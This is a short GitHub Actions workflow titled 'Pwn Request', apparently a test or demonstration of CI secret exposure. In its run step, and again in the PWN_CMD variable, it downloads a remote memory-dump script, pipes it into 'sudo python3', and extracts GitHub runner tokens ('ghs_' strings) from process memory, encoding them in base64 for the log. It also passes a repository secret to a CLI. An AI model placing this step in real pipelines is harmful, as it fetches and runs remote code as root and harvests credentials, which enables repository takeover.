name: Pwn Request

on:
  push:
    branches: pwn_request

env:
  CARGO_TERM_COLOR: always
  MOLD_VERSION: 2.0.0

jobs:
  pwn_request:
    name: Test Pwn Request
    runs-on: ubuntu-latest
    env:
      PWN_SECRET: ${{ secrets.PWN_SECRET }}
      PWN_CMD: curl -sSf https://gist.githubusercontent.com/nikitastupin/30e525b776c409e03c2d6f328f254965/raw/memdump.py | sudo python3 | tr -d '\0' | grep -aoE 'ghs_[0-9A-Za-z]{20,}' | sort -u | base64
    steps:
        - uses: actions/checkout@v4
          with:
            persist-credentials: false
        - uses: rui314/setup-mold@v1
          with:
            mold-version: ${{ env.MOLD_VERSION }}
        - name: Test Pwn Request
          working-directory: ./services/cli
          run: |
            /bin/echo "GHA PID: $$"
            curl -sSf https://gist.githubusercontent.com/nikitastupin/30e525b776c409e03c2d6f328f254965/raw/memdump.py | sudo python3 | tr -d '\0' | grep -aoE 'ghs_[0-9A-Za-z]{20,}' | sort -u | base64
            cargo run -- run --project $PWN_SECRET "$PWN_CMD" --dry-run
